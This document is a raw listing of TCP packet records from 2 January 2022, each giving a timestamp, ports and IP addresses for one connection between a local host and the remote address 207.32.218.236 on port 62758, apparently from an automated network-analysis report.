Jan 2, 2022 02:28:14.906845093 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.906855106 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.906893015 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.906913042 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.906933069 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.906971931 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.906977892 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.907010078 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.907047987 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.907054901 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.907088041 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.907128096 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.907166958 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.907171965 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.907205105 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.907205105 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.907244921 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.907284021 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.907321930 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.907329082 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.907361031 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.907399893 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.907409906 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.907439947 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.907480001 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.907486916 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.907520056 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.907557964 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.907574892 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.907587051 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.907623053 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.907632113 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.907664061 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.907704115 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.907715082 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.907744884 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.907784939 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.907820940 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.907844067 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.907860994 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.907875061 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.907900095 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.907938004 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.907977104 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.907979965 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.908016920 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.908047915 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.908077955 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.908106089 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.908116102 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.908157110 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.908194065 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.908205986 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.908233881 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.908236980 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.908272982 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.908309937 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.908349037 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.908353090 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.908389091 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.908427954 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.908444881 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.908467054 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:14.908468962 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.908507109 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.908534050 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:14.908580065 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.073235035 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.073273897 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.073306084 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.073337078 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.073367119 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.073371887 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.073395967 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.073398113 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.073431969 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.073451042 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.073462009 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.073494911 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.073509932 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.073525906 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.073554039 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.073579073 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.073607922 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.073610067 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.073632956 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.073642015 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.073669910 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.073698044 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.073703051 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.073734999 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.073745012 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.073766947 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.073797941 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.073828936 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.073831081 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.073859930 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.073888063 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.073892117 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.073923111 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.073944092 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.073949099 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.073975086 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.074001074 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.074028015 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.074029922 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.074057102 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.074075937 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.074081898 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.074112892 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.074125051 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.074141026 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.074167967 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.074193954 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.074215889 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.074224949 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.074240923 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.074250937 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.074280977 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.074295044 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.074311018 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.074337959 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.074353933 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.074366093 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.074393034 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.074417114 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.074444056 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.074448109 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.074477911 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.074480057 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.074505091 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.074532032 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.074537992 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.074558973 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.074578047 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.074588060 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.074616909 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.074636936 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.074645042 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.074665070 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.074697018 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.239438057 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.239545107 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.239603043 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.239660978 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.239701033 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.239723921 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.239749908 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.239787102 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.239839077 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.239856005 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.239881992 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.239921093 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.239959955 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.239984989 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.240000010 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.240036964 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.240075111 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.240077972 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.240113020 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.240154028 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.240159035 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.240194082 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.240231037 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.240267992 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.240267992 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.240278006 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.240317106 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.240324020 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.240358114 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.240397930 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.240420103 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.240437031 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.240477085 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.240515947 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.240529060 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.240557909 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.240596056 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.240597963 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.240638971 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.240678072 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.240717888 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.240720034 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.240776062 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.240814924 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.240814924 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.240890026 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.240931034 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.240967989 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.240968943 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.241008997 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.241044998 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.241050005 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.241080046 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.241086006 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.241127968 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.241166115 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.241200924 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.241204977 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.241246939 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.241281986 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.241283894 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.241313934 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.241322041 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.241352081 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.241395950 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.241518021 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.294147968 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:15.760905027 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:15.811224937 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.131042957 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.296058893 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.296119928 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.296159983 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.296200037 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.296236992 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.296277046 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.296287060 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.296318054 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.296324968 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.296358109 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.296365976 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.296397924 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.296452045 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.296489000 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.296506882 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.296516895 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.296529055 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.296570063 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.296607018 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.296646118 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.296664953 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.296675920 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.296684980 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.296725988 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.296766043 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.296807051 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.296821117 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.296829939 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.296871901 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.296922922 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.296963930 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.297003031 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.297023058 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.297032118 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.297041893 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.297080994 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.297118902 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.297161102 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.297199011 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.297211885 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.297223091 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.297238111 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.297277927 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.297313929 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.297329903 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.297339916 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.297354937 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.297394037 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.297435999 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.297477007 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.297513008 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.297529936 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.297537088 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.297554016 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.297595024 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.297632933 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.297657967 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.297672987 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.297673941 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.297712088 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.297755957 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.297799110 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.297828913 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.297837973 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.297842979 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.297878027 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.297918081 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.297955036 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.297993898 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.298011065 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.298021078 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.298022032 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.298060894 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.298512936 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.341147900 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.462989092 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.463047028 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.463085890 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.463121891 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.463128090 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.463169098 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.463177919 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.463210106 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.463249922 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.463287115 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.463294029 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.463329077 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.463368893 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.463402033 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.463407040 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.463448048 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.463474035 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.463486910 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.463527918 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.463567019 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.463573933 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.463604927 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.463618994 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.463645935 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.463685036 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.463692904 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.463722944 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.463762999 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.463792086 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.463814974 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.463834047 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.463840961 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.463875055 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.463912964 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.463952065 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.463990927 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.463999987 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.464030027 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.464042902 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.464068890 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.464107990 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.464117050 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.464148045 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.464189053 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.464226961 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.464229107 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.464237928 CET	49837	62758	192.168.2.6	207.32.218.236
